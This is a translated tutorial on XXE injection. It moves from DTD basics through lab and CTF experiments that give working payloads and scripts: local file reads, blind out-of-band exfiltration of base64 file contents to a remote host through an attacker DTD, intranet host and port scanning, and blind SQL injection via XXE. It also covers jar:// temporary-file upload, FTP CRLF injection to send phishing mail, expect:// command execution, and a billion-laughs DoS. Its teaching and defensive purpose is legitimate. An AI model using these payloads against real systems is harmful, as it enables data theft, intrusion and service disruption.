An article takes you in-depth understanding of the XXE vulnerability of the vulnerability

Table of contents

  1. 1. What is XXE
  2. Second, briefly introduce the background knowledge:
  3. 3. Basic knowledge
    1. Here comes the point:
  4. 4. What can we do
    1. Experiment 1: Read local sensitive files with echo (Normal XXE)
    2. new problems arise
    3. new solution
    4. Experiment 2: Read local sensitive files without echo (Blind OOB XXE)
    5. New thinking:
    6. New exploits:
    7. Experiment 3: HTTP intranet host detection
    8. Experiment 4: HTTP intranet host port scanning
    9. Experiment 5: Intranet Blind Injection (CTF)
    10. Experiment 6: File upload
    11. Experiment 7: Fishing:
    12. Experiment 8: Others:
  5. 5. Where does the real XXE appear?
    1. Example 1: Simulation situation
    2. Example 2: XXE of WeChat Pay
    3. Example 3: JSON content-type XXE
  6. 6. How XXE defends
    1. Option 1: Use the language-recommended method of disabling external entities
    2. Solution 2: Manual blacklist filtering (not recommended)
  7. 7. Summary

1. What is XXE

Before introducing XXE, let me talk about ordinary XML injection. The use of this is relatively narrow, and if there is any, it should be a logical loophole.

as the picture shows:

Since we can insert XML code, we must not let it go, we need more, so XXE appeared

XXE (XML External Entity Injection) is called XML External Entity Injection. It can be seen from the name that this is an injection vulnerability. What is injected? XML external entity. (Seeing this, someone must say: You are not talking nonsense), of course, in fact, I just want to emphasize that our use point is an  external entity  , and it is also to remind readers to focus on external entities instead of being confused by XML. Some other things with similar names disturb the thinking ( just keep an eye on the external entity ). If the external entity can be injected and successfully parsed, this will greatly broaden the attack surface of our XML injection (this may be why it is said separately and not mentioned. The reason for XML injection, maybe ordinary XML injection is really too tasteless, and it is hardly used in reality)

[One by one help to learn safely one by one]

①Network security learning route

②20 penetration testing e-books

③Security offense and defense 357 pages of notes

④50 security offensive and defensive interview guides

⑤Security Red Team Penetration Toolkit

⑥ Necessary Books on Network Security

⑦100 actual combat cases of vulnerabilities

⑧Internal video resources of major security factories

⑨Analysis of past CTF capture the flag questions

Second, briefly introduce the background knowledge:

XML is a very popular markup language, first standardized in the late 1990s and adopted by countless software projects. It is used for configuration files, document formats (such as OOXML, ODF, PDF, RSS, ...), image formats (SVG, EXIF ​​headers) and network protocols (WebDAV, CalDAV, XMLRPC, SOAP, XMPP, SAML, XACML, . ..), he uses it so pervasively that any problems with it can have disastrous results.

In the process of parsing external entities, XML parsers can query various network protocols and services (DNS, FTP, HTTP, SMB, etc.) according to the scheme (protocol) specified in the URL. External entities are useful for creating dynamic references in documents so that any changes made to the referenced resource are automatically updated in the document. However, many attacks can be launched against the application when dealing with external entities. These attacks include exfiltrating local system files, which may contain sensitive data such as passwords and private user data, or exploiting the network access capabilities of various schemes to manipulate internal applications. By combining these attacks with other implementation flaws, the scope of these attacks can be extended to client-side memory corruption, arbitrary code execution, and even service disruption, depending on the context of these attacks.

3. Basic knowledge

XML documents have their own format specification, which is controlled by something called DTD (document type definition), which looks like this

Sample code:

<?xml version="1.0"?>//这一行是 XML 文档定义
<!DOCTYPE message [
<!ELEMENT message (receiver ,sender ,header ,msg)>
<!ELEMENT receiver (#PCDATA)>
<!ELEMENT sender (#PCDATA)>
<!ELEMENT header (#PCDATA)>
<!ELEMENT msg (#PCDATA)>

The above DTD defines that the root element of XML is message, and then there are some sub-elements below the element, then the XML must be written as follows

Sample code:

<message>
<receiver>Myself</receiver>
<sender>Someone</sender>
<header>TheReminder</header>
<msg>This is an amazing book</msg>
</message>

In fact, in addition to defining elements in DTD (actually corresponding to tags in XML), we can also define entities in DTD (corresponding to the content in XML tags). After all, in addition to tags in ML, some content needs to be fixed

Sample code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe "test" >]>

Here the element is defined as ANY, which means that any element is accepted, but an xml entity is defined (this is the first time we see the true face of the entity in this article, the entity can actually be regarded as a variable, and then we can in the XML referenced via the & symbol), then the XML can be written as

Sample code:

<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

We use &xxe to refer to the xxe entity defined above, and &xxe will be replaced by "test" when outputting.

Here comes the point:

Key one:

Entities are divided into two types, internal entities and external entities . The example we gave above is internal entities, but entities can actually be referenced from external dtd files. Let's look at the following code:

Sample code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

This way any changes made to referenced resources are automatically updated in the document, which is very convenient ( convenience is always the enemy of security )

Of course, there is another way to reference is to use the method of referencing the public DTD  , the syntax is as follows:

<!DOCTYPE 根元素名称 PUBLIC “DTD标识名” “公用DTD的URI”>

This can also play the same role as SYSTEM in our attack

Key point two:

We have divided entities into two factions above (internal entities and external entities), but in fact, from another perspective, entities can also be divided into two factions (general entities and parameter entities), don't be confused. .

1. Generic entity

Entities referenced with &entityname; defined in the DTD and referenced in the XML document

Sample code:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE updateProfile [<!ENTITY file SYSTEM "file:///c:/windows/win.ini"> ]> 
<updateProfile>  
    <firstname>Joe</firstname>  
    <lastname>&file;</lastname>  
    ... 
</updateProfile>

2. Parameter entity:

(1) Use  % 实体名( here there must be no less spaces ) defined in DTD, and can only be  referenced in DTD %实体名;
(2) Only in the DTD file, the declaration of the parameter entity can refer to other entities
(3) Like the general entity, the parameter Entities can also be referenced externally

Sample code:

<!ENTITY % an-element "<!ELEMENT mytag (subtag)>"> 
<!ENTITY % remote-dtd SYSTEM "http://somewhere.example.org/remote.dtd"> 
%an-element; %remote-dtd;

Toss:

Parameter entities play a vital role in our Blind XXE

4. What can we do

The madness in the previous section hinted at  an external entity  , so what on earth can he do?

In fact, when you see the following code, a little security-conscious partner should be able to vaguely detect something

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [
<!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///c:/test.dtd" >]>
<creds>
<user>&xxe;</user>
<pass>mypass</pass>
</creds>

Since we can read dtd, can we change the path to the path of sensitive files, and then read out the sensitive files?

Experiment 1: Read local sensitive files with echo (Normal XXE)

The attack scenario of this experiment simulates that when the service can receive and parse the input in XML format and has an echo, we can input our custom XML code and refer to the file on the server by referencing an external entity

Put the PHP code for parsing XML on the local server:

Sample code:

xml.php

<?php

    libxml_disable_entity_loader (false);
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    $creds = simplexml_import_dom($dom);
    echo $creds;

?>

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE creds [  
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]> 
<creds>&goodies;</creds>

The result is as follows:

But because this file has no special symbols, it can be said to be quite smooth when we read it, so what if we change to the following file?

as the picture shows:

Let's try:

The result is as follows:

It can be seen that not only did not read the file we wanted, but also reported a lot of errors to us, what should we do? At this time, we will sacrifice another artifact --- CDATA, a brief introduction is as follows (quoting from my blog introducing XML):

Some content may not be parsed and executed by the parsing engine , but treated as original content. It is used to parse the entire piece of data into pure character data instead of tags. It contains a large number of <> & or
" characters, all characters in the CDATA section will be treated as a constant part of the element's character data, not an xml tag

<![CDATA[


XXXXXXXXXXXXXXXXX

]]>

Any character can be entered except ]]> cannot be nested

The usefulness is that in case a tag contains special characters or uncertain characters, we can wrap it with CDATA

Then we can bypass it by putting our read data in CDATA and outputting it, but how to do it, let's analyze it briefly:

First, find where the problem occurs, the problem occurs in

...
<!ENTITY goodies SYSTEM "file:///c:/windows/system.ini"> ]>
<creds>&goodies;</creds>

Quotes do not accept characters that may cause confusion in the xml format (in XML, sometimes entities contain some characters, such as &,<,>,",', etc. These need to be escaped, otherwise the XML Interpreter generates errors), we want to add "<![CDATA[" and "]]>" on both sides of the reference, but there seems to be no grammar telling us that the string can be spliced, so I thought about whether I can use multiple Entity continuous reference method

The result is as follows:

Note that the three entities here are all in the form of strings, and an error is reported when they are connected together. This means that we cannot splice in xml, but need to call it in xml after splicing, so if we want to splice in
DTD , we know we have only one option, which is to use the parameter entity

payload:

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE roottag [
<!ENTITY % start "<![CDATA[">   
<!ENTITY % goodies SYSTEM "file:///d:/test.txt">  
<!ENTITY % end "]]>">  
<!ENTITY % dtd SYSTEM "http://ip/evil.dtd"> 
%dtd; ]> 

<roottag>&all;</roottag>

evil.dtd

<?xml version="1.0" encoding="UTF-8"?> 
<!ENTITY all "%start;%goodies;%end;">

The result is as follows:

Interested children's shoes can analyze the entire calling process, because I have analyzed a similar example in the following example, so I will not analyze it here for space considerations.

Notice:


Here is a point. If there is another protocol in java that can replace the file protocol, that is netdoc. I will demonstrate how to use it later when analyzing WeChat's XXE

new problems arise

However, if you think about it, you know that the XML on the server itself is not for output. It is generally used for configuration or in some extreme cases by using other vulnerabilities to instantiate classes that parse XML, so we want to be realistic To exploit this vulnerability, you must find a method that does not rely on its echo --- takeaway

new solution

If you want to take out, you must be able to initiate a request, so where can you initiate a request? Obviously, when our external entity is defined, in fact, it is not enough to just initiate a request. We have to be able to pass our data out, and our data itself is also an external request, that is to say, we need to quote it in the request The result of another request, after analysis, only our parameter entity can do it (and according to the specification, we must complete the requirement of "quoting the result of another request in the request" in a DTD file)

Experiment 2: Read local sensitive files without echo (Blind OOB XXE)

xml.php

<?php

libxml_disable_entity_loader (false);
$xmlfile = file_get_contents('php://input');
$dom = new DOMDocument();
$dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
?>

test.dtd

<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=file:///D:/test.txt">
<!ENTITY % int "<!ENTITY % send SYSTEM 'http://ip:9999?p=%file;'>">

2019.5.8 update

I found that the above code converted the HTML entity in front of send into % due to parsing problems. Although I made some explanations below, because of the behavior of copying and pasting codes, I decided to use pictures here. show me my code again

payload:

<!DOCTYPE convert [ 
<!ENTITY % remote SYSTEM "http://ip/test.dtd">
%remote;%int;%send;
]>

The result is as follows:

We clearly see that the server has received the base64-encoded sensitive file information (encoding is also to not destroy the original XML syntax), and an error will be reported if it is not encoded.

The whole calling process:

From the payload, we can see that three parameter entities %remote;%int;%send; are called continuously, this is our utilization sequence, %remote is called first, and after calling, it requests test.dtd on the remote server, which is similar to Include test.dtd, then %int calls %file in test.dtd, %file will get the sensitive file on the server, and then fill the result of %file into %send (because the value of the entity cannot There is %, so convert it into html entity code  &#37;), we call %send again; send our read data to our remote vps, so that the effect of external data is realized, which perfectly solves XXE No echo problem.

New thinking:

We just did one thing just now, that is to read local files through the file protocol, or send requests through the http protocol. Children's shoes who are familiar with SSRF should respond quickly. This is actually very similar to SSRF, because they can read from The server initiates a request to another server, so if we change the address of the remote server to an intranet address (such as 192.168.0.10:8080), can the same effect of SSRF be achieved? That's right, XXE is actually an SSRF attack method, because SSRF is actually just an attack mode, and we can use many protocols and vulnerabilities to attack by using this attack mode.

New exploits:

So if we want to make further use, we can't limit our vision to the file protocol. We must clearly know which platform and protocol we can use.

as the picture shows:

Protocols that PHP can support after installing the extension:

as the picture shows:

Notice:

1. Starting from September 2012, the support for the gopher scheme has been removed from the Oracle JDK version, and the later supported versions are Oracle JDK 1.7 update
7 and Oracle JDK 1.6 update 35
2.libxml is the xml support of PHP

Experiment 3: HTTP intranet host detection

We use the server with XXE vulnerability as our fulcrum to detect the intranet. We need to do some preparatory work for intranet detection. We need to use the file protocol to read the network configuration file of our fulcrum server to see if there is an intranet and what the network segment looks like (I use linux as an example ), we can try to read the /etc/network/interfaces or /proc/net/arp or /etc/host file and then we have a general detection direction

The following is an example of a probe script:

import requests
import base64

#Origtional XML that the server accepts
#<xml>
#    <stuff>user</stuff>
#</xml>


def build_xml(string):
    xml = """<?xml version="1.0" encoding="ISO-8859-1"?>"""
    xml = xml + "\r\n" + """<!DOCTYPE foo [ <!ELEMENT foo ANY >"""
    xml = xml + "\r\n" + """<!ENTITY xxe SYSTEM """ + '"' + string + '"' + """>]>"""
    xml = xml + "\r\n" + """<xml>"""
    xml = xml + "\r\n" + """    <stuff>&xxe;</stuff>"""
    xml = xml + "\r\n" + """</xml>"""
    send_xml(xml)

def send_xml(xml):
    headers = {'Content-Type': 'application/xml'}
    x = requests.post('http://34.200.157.128/CUSTOM/NEW_XEE.php', data=xml, headers=headers, timeout=5).text
    coded_string = x.split(' ')[-2] # a little split to get only the base64 encoded value
    print coded_string
#   print base64.b64decode(coded_string)
for i in range(1, 255):
    try:
        i = str(i)
        ip = '10.0.0.' + i
        string = 'php://filter/convert.base64-encode/resource=http://' + ip + '/'
        print string
        build_xml(string)
    except:
continue

return result:

Experiment 4: HTTP intranet host port scanning

We found a host on the intranet, and want to know where the attack point is, we still need to perform port scanning, the script host detection of port scanning has almost no changes, just fix the ip address, and then loop through the ports, of course Our port judges whether the port is open by the length of the response time. Readers can modify it by themselves. Of course, in addition to this method, we can also use burpsuite for port detection.

For example, we pass in:

<?xml version="1.0" encoding="utf-8"?>  
<!DOCTYPE data SYSTEM "http://127.0.0.1:515/" [  
<!ELEMENT data (#PCDATA)>  
]>
<data>4</data>

return result:

javax.xml.bind.UnmarshalException  
 - with linked exception:
[Exception [EclipseLink-25004] (Eclipse Persistence Services): org.eclipse.persistence.exceptions.XMLMarshalException
Exception Description: An error occurred unmarshalling the document  
Internal Exception: ████████████████████████: Connection refused

This completes a port detection. If you want more, we can use the requested port as a parameter and use bp's intruder to help us detect

As shown below:

So far, we have been able to conduct a comprehensive detection of the entire network segment, and can get some information about the intranet server. If the intranet server has a loophole, and the exploit method happens to be within the scope of the protocol supported by the server, We can directly use XXE to attack intranet servers and even directly getshell (for example, some unauthorized redis on the intranet or some can directly getshell through http get requests, such as strus2)

Experiment 5: Intranet Blind Injection (CTF)

One question in the 2018 Qiangwang Cup is to use the XXE vulnerability to perform blind SQL injection on the intranet. The general idea is as follows:

Firstly, we found XXE vulnerability in the comment box with ip address 39.107.33.75:33899 on the external network. When we input xml and dtd, an error will appear

as the picture shows:

In this case, can we read the files on the server? Let’s read the configuration file first (this point is Blind XXE, which must use parameter entities and external references to DTD)

/var/www/52dandan.cc/public_html/config.php

Get the first part of the flag

<?php
define(BASEDIR, "/var/www/52dandan.club/");
define(FLAG_SIG, 1);
define(SECRETFILE,'/var/www/52dandan.com/public_html/youwillneverknowthisfile_e2cd3614b63ccdcbfe7c8f07376fe431');
....
?>

Notice:

Here is a little trick. When we use libxml to read the content of the file, the file cannot be too large. If it is too large, an error will be reported, so we need to use a compression method of the php filter to compress
:

echo file_get_contents("php: //filter/zlib.deflate/convert.base64-encode/resource=/etc/passwd");
Decompression: echo file_get_contents("php://filter/read=convert.base64-decode/zlib.inflate/resource=/ tmp/1");

Then we consider whether there is anything on the intranet, we read

/proc/net/arp
/etc/host

Find the ip address of another server on the intranet 192.168.223.18

After getting this ip, we considered to use XXE for port scanning, and then we found that port 80 was open, and then we scanned the directory and found a test.php. According to the prompt, there is an injection in the shop parameter of this page, but because This itself is a Blind XXE, our request to the server is included in our remote DTD, now we need to change our request, then we have to modify the DTD file of our remote server every time we modify the request , so our script will be hung on our VPS, while modifying the DTD and sending requests to hosts with XXE vulnerabilities, the script looks like this

Sample code:

import requests
url = 'http://39.107.33.75:33899/common.php'
s = requests.Session()
result = ''
data = {
        "name":"evil_man",
        "email":"[email protected]",
        "comment":"""<?xml version="1.0" encoding="utf-8"?>
                <!DOCTYPE root [
                <!ENTITY % dtd SYSTEM "http://evil_host/evil.dtd">
                %dtd;]>
                """
}

for i in range(0,28):
        for j in range(48,123):
                f = open('./evil.dtd','w')
            payload2 = """<!ENTITY % file SYSTEM "php://filter/read=zlib.deflate/convert.base64-encode/resource=http://192.168.223.18/test.php?shop=3'-(case%a0when((select%a0group_concat(total)%a0from%a0albert_shop)like%a0binary('{}'))then(0)else(1)end)-'1">
                <!ENTITY % all "<!ENTITY % send SYSTEM 'http://evil_host/?result=%file;'>">
                %all;
                %send;""".format('_'*i+chr(j)+'_'*(27-i))
                f.write(payload2)
                f.close()
                print 'test {}'.format(chr(j))
                r = s.post(url,data=data)
                if "Oti3a3LeLPdkPkqKF84xs=" in r.content and chr(j)!='_':
                        result += chr(j)
                        print chr(j)
                        break
print result

This question is more difficult than it is, and it is very time-consuming to do. Everything has to be guessed by the script, so it was 0 solution at that time.

Experiment 6: File upload

What we said before seems to be related to php, but in reality, many of them are XXE vulnerabilities in the java framework. After reading the documentation, I found that there is a relatively magical protocol jar:// in Java, phar in php: // It seems to be designed to achieve similar functions of jar://.

The format of the jar:// protocol:

jar:{url}!{path}

Example:

jar:http://host/application.jar!/file/within/the/zip

这个 ! 后面就是其需要从中解压出的文件

jar can get jar files remotely, and then decompress the contents, etc., this function seems to be more powerful than phar, phar:// cannot load files remotely (so phar:// is generally used to bypass files Upload, I have investigated this knowledge point in some HCTFs in 2016. I have also asked similar questions in the school competition. Oh, the deserialization of phar:// described by blackhat in 2018 is very interesting. Orange has been in This question was asked in hitcon in 2017)

The process of jar protocol processing files:

(1) Download the jar/zip file to a temporary file
(2) Extract the file we specified
(3) Delete the temporary file

So how do we find the temporary files we downloaded?

Because the file:/// protocol can play the role of listing directories in java, we can use the file:/// protocol with the jar:// protocol

Here are some of my testing procedures:

I first simulate a program with XXE locally, and I found a java source code that can directly parse XML files on the Internet.

Sample code:

xml_test.java

package xml_test;
import java.io.File;

import javax.xml.parsers.DocumentBuilder;
import javax.xml.parsers.DocumentBuilderFactory;

import org.w3c.dom.Attr;
import org.w3c.dom.Comment;
import org.w3c.dom.Document;
import org.w3c.dom.Element;
import org.w3c.dom.NamedNodeMap;
import org.w3c.dom.Node;
import org.w3c.dom.NodeList;

/**
 * 使用递归解析给定的任意一个xml文档并且将其内容输出到命令行上
 * @author zhanglong
 *
 */
public class xml_test
{
    public static void main(String[] args) throws Exception
    {
        DocumentBuilderFactory dbf = DocumentBuilderFactory.newInstance();
        DocumentBuilder db = dbf.newDocumentBuilder();

        Document doc = db.parse(new File("student.xml"));
        //获得根元素结点
        Element root = doc.getDocumentElement();

        parseElement(root);
    }

    private static void parseElement(Element element)
    {
        String tagName = element.getNodeName();

        NodeList children = element.getChildNodes();

        System.out.print("<" + tagName);

        //element元素的所有属性所构成的NamedNodeMap对象,需要对其进行判断
        NamedNodeMap map = element.getAttributes();

        //如果该元素存在属性
        if(null != map)
        {
            for(int i = 0; i < map.getLength(); i++)
            {
                //获得该元素的每一个属性
                Attr attr = (Attr)map.item(i);

                String attrName = attr.getName();
                String attrValue = attr.getValue();

                System.out.print(" " + attrName + "=\"" + attrValue + "\"");
            }
        }

        System.out.print(">");

        for(int i = 0; i < children.getLength(); i++)
        {
            Node node = children.item(i);
            //获得结点的类型
            short nodeType = node.getNodeType();

            if(nodeType == Node.ELEMENT_NODE)
            {
                //是元素,继续递归
                parseElement((Element)node);
            }
            else if(nodeType == Node.TEXT_NODE)
            {
                //递归出口
                System.out.print(node.getNodeValue());
            }
            else if(nodeType == Node.COMMENT_NODE)
            {
                System.out.print("<!--");

                Comment comment = (Comment)node;

                //注释内容
                String data = comment.getData();

                System.out.print(data);

                System.out.print("-->");
            }
        }

        System.out.print("</" + tagName + ">");
    }
}

With this source code, we need to create an xml file locally, I named it student.xml

student.xml

<!DOCTYPE convert [ 
<!ENTITY  remote SYSTEM "jar:http://localhost:9999/jar.zip!/wm.php">
]>
<convert>&remote;</convert>

The directory structure is as follows:

It can be clearly seen that my request is sent to my local port 9999, so what services are there on port 9999? It's actually a TCP server written by myself in python

Sample code:

sever.py

import sys 
import time 
import threading 
import socketserver 
from urllib.parse import quote 
import http.client as httpc 

listen_host = 'localhost' 
listen_port = 9999 
jar_file = sys.argv[1]

class JarRequestHandler(socketserver.BaseRequestHandler):  
    def handle(self):
        http_req = b''
        print('New connection:',self.client_address)
        while b'\r\n\r\n' not in http_req:
            try:
                http_req += self.request.recv(4096)
                print('Client req:\r\n',http_req.decode())
                jf = open(jar_file, 'rb')
                contents = jf.read()
                headers = ('''HTTP/1.0 200 OK\r\n'''
                '''Content-Type: application/java-archive\r\n\r\n''')
                self.request.sendall(headers.encode('ascii'))

                self.request.sendall(contents[:-1])
                time.sleep(30)
                print(30)
                self.request.sendall(contents[-1:])

            except Exception as e:
                print ("get error at:"+str(e))


if __name__ == '__main__':

    jarserver = socketserver.TCPServer((listen_host,listen_port), JarRequestHandler) 
    print ('waiting for connection...') 
    server_thread = threading.Thread(target=jarserver.serve_forever) 
    server_thread.daemon = True 
    server_thread.start() 
    server_thread.join()

The purpose of this server is to accept the client's request, and then send the client a file specified by the parameters we passed in at runtime, but it's not over yet. In fact, I added a sleep(30) here. The purpose of this will be later besides

Since it is a file upload, we have to go back to the process of parsing the file with the jar protocol

The process of jar protocol processing files:

(1) Download the jar/zip file to a temporary file
(2) Extract the file we specified
(3) Delete the temporary file

So how do we find this temporary folder? Don't think about it, it must be displayed in the form of an error report. If we request

jar:http://localhost:9999/jar.zip!/1.php

1. If there is no php in this jar.zip, the java parser will report an error saying that this file cannot be found in this temporary file

As shown below:

Now that we have found the path of the temporary file, we have to consider how to use this file (or how to make this file stay in our system for a longer time, the way I think of is sleep()) But there is another Problem, because the time we want to use it must be when the file has not been completely transferred, so for the integrity of the file, I consider using a hex editor to add junk characters at the end of the file before transferring, which can perfectly solve this problem question

The following is my experimental screen recording:

This is the end of the experiment, how to use it is up to you guys (bad smile)

I came up with such a CTF topic in LCTF 2018. For detailed wp, you can read this article of mine

Experiment 7: Fishing:

If there is a vulnerable SMTP server on the intranet, we can use the ftp:// protocol combined with CRLF injection to send arbitrary commands to it, that is, we can designate it to send arbitrary emails to any person, thus forging the information source and causing Fishing (the following example comes from an article on fb)

Java supports ftp URIs in sun.net.ftp.impl.FtpClient. Therefore, we can specify a username and password, such as ftp://user:password@host:port/test.txt, and the FTP client will send the corresponding USER command in the connection.

But if we add %0D%0A (CRLF) anywhere in the user part of the URL, we can terminate the USER command and inject a new command into the FTP session, allowing us to send arbitrary SMTP commands to port 25:

Sample code:

ftp://a%0D%0A
EHLO%20a%0D%0A
MAIL%20FROM%3A%3Csupport%40VULNERABLESYSTEM.com%3E%0D%0A
RCPT%20TO%3A%3Cvictim%40gmail.com%3E%0D%0A
DATA%0D%0A
From%3A%20support%40VULNERABLESYSTEM.com%0A
To%3A%20victim%40gmail.com%0A
Subject%3A%20test%0A
%0A
test!%0A
%0D%0A
.%0D%0A
QUIT%0D%0A
:[email protected]:25

When an FTP client connects using this URL, the following command will be sent to the mail server on VULNERABLESYSTEM.com:

Sample code:

ftp://a
EHLO a
MAIL FROM: <[email protected]>
RCPT TO: <[email protected]>
DATA
From: [email protected]
To: [email protected]
Subject: Reset your password
We need to confirm your identity. Confirm your password here: http://PHISHING_URL.com
.
QUIT
:[email protected]:25

This means attackers can send phishing emails (for example: account reset links) from trusted sources and bypass spam filters. In addition to links, even we can send attachments.

Experiment 8: Others:

In addition to some common uses in the above experiments, there are some less commonly used or useless ways to use them. For the sake of completeness, I will briefly talk about them in this section:

1.PHP expect RCE

Since PHP's expect is not installed by default, if this expect extension is installed, we can directly use XXE for RCE

Sample code:

<!DOCTYPE root[<!ENTITY cmd SYSTEM "expect://id">]>
<dir>
<file>&cmd;</file>
</dir>

2. Using XXE to conduct DOS attacks

Sample code:

<?xml version="1.0"?>
     <!DOCTYPE lolz [
     <!ENTITY lol "lol">
     <!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
     <!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
     <!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
     <!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
     <!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
     <!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
     <!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
     <!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
     ]>
     <lolz>&lol9;</lolz>

5. Where does the real XXE appear?

What we have just said is just our understanding of this vulnerability, but it seems that we haven’t said where this vulnerability appears

Today's web era is an era of front-end and back-end separation. Some people say that MVC is the separation of front-end and back-end, but I think this separation is not complete. The back-end still has to try to call the rendering class to control the rendering of the front-end. What I said The front-end and back-end separation is that the back-end API is only responsible for accepting the agreed data to be passed in, and then after a series of black-box calculations, the result will be returned to the front-end in json format, and the front-end is only responsible for sitting back and enjoying the success and getting the data json.decode That’s enough (the backend here can be background code or an external api interface, and the frontend here can be a traditional frontend or background code)

Then the problem often occurs when the api interface can parse the xml code passed by the client and directly reference external entities, such as the following

Example 1: Simulation situation

Sample code:

POST /vulnerable HTTP/1.1
Host: www.test.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Referer: https://test.com/test.html
Content-Type: application/xml
Content-Length: 294
Cookie: mycookie=cookies;
Connection: close
Upgrade-Insecure-Requests: 1

<?xml version="1.0"?>
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>XML is the best!</description>
   </core>
</catalog>

After we issue a POST request with xml, the above code will be parsed by the server's XML processor. The code is interpreted and returns: {"Request Successful": "Added!"}

But if we pass in a malicious code

<?xml version="1.0"?>
<!DOCTYPE GVI [<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<catalog>
   <core id="test101">
      <author>John, Doe</author>
      <title>I love XML</title>
      <category>Computers</category>
      <price>9.99</price>
      <date>2018-10-01</date>
      <description>&xxe;</description>
   </core>
</catalog>

If the "safety measures" are not done well, the malicious code will be parsed, and the following return will occur

{"error": "no results for description root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync...

Example 2: XXE of WeChat Pay

Of course I have to mention the XXE vulnerability of WeChat Pay, which was very popular a while ago.

Vulnerability description:

WeChat Pay provides an api interface for merchants to receive asynchronous payment results. The java sdk used by WeChat Pay may trigger an XXE vulnerability when processing the results. Attackers can send malicious payloads to this interface to obtain any information on the merchant server. Once the attacker gets the sensitive data (md5-key and merchant-Id etc.), he may buy any item from the merchant without spending money by sending forged information

I downloaded the java version of the sdk for analysis. This sdk provides a WXPayUtil tool class, which implements the two methods xmltoMap and maptoXml. The xxe vulnerability outbreak point of WeChat payment this time is in the xmltoMap method

as the picture shows:

The problem is in the part I have drawn out with a horizontal line, which is simplified to the following code:

public static Map<String, String> xmlToMap(String strXML) throws Exception {
        try {
            Map<String, String> data = new HashMap<String, String>();
            DocumentBuilder documentBuilder = WXPayXmlUtil.newDocumentBuilder();
            InputStream stream = new ByteArrayInputStream(strXML.getBytes("UTF-8"));
            org.w3c.dom.Document doc = documentBuilder.parse(stream);
            ...

We can see that after the documentBuilder is built, the incoming strXML is directly parsed. Unfortunately, strXML is a parameter controllable by the attacker, so the XXE vulnerability appears. The following are the steps of my experiment

First of all, I created a new package under the com package to write our test code. I named the test code test001.java

as the picture shows:

test001.java

package com.test.test001;

import java.util.Map;

import static com.github.wxpay.sdk.WXPayUtil.xmlToMap;

public class test001 {
    public static void main(String args[]) throws Exception {

        String xmlStr ="<?xml version='1.0' encoding='utf-8'?>\r\n" +
                "<!DOCTYPE XDSEC [\r\n" +
                "<!ENTITY xxe SYSTEM 'file:///d:/1.txt'>]>\r\n" +
                "<XDSEC>\r\n"+
                "<XXE>&xxe;</XXE>\r\n" +
                "</XDSEC>";

        try{

            Map<String,String> test = xmlToMap(xmlStr);
            System.out.println(test);
        }catch (Exception e){
            e.printStackTrace();
        }

    }
}

I hope it can read the 1.txt file under my D drive

Successfully read after running

as the picture shows:

Of course, there is this sdk configuration item in WXPayXmlUtil.java, which can directly determine the effect of the experiment. Of course, the later repairs are also for this.

http://apache.org/xml/features/disallow-doctype-decl true
http://apache.org/xml/features/nonvalidating/load-external-dtd false
http://xml.org/sax/features/external-general-entities false
http://xml.org/sax/features/external-parameter-entities false

I have packaged the entire information and uploaded it, interested children’s shoes can run it to feel

Link: Internet Safety Information 

As mentioned above, there is a netdoc:/ protocol in java that can replace file:///. Let me demonstrate it now:

as the picture shows:

Example 3: JSON content-type XXE

As we know, many web and mobile applications are based on web communication services in client-server interaction mode. Whether it is SOAP or RESTful, generally for web services, the most common data formats are XML and JSON. Although a web service may be programmed to use only one of these formats, the server can accept other data formats that the developer did not anticipate, which may lead to XXE (XML External Entity) attacks on JSON nodes

Raw request and response:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/json
Content-Length: 38

{"search":"name","value":"netspitest"}

HTTP Response:

HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 43

{"error": "no results for name netspitest"}

Now we try to modify the Content-Type to application/xml

Further requests and responses:

HTTP Request:

POST /netspi HTTP/1.1
Host: someserver.netspi.com
Accept: application/json
Content-Type: application/xml
Content-Length: 38

{"search":"name","value":"netspitest"}

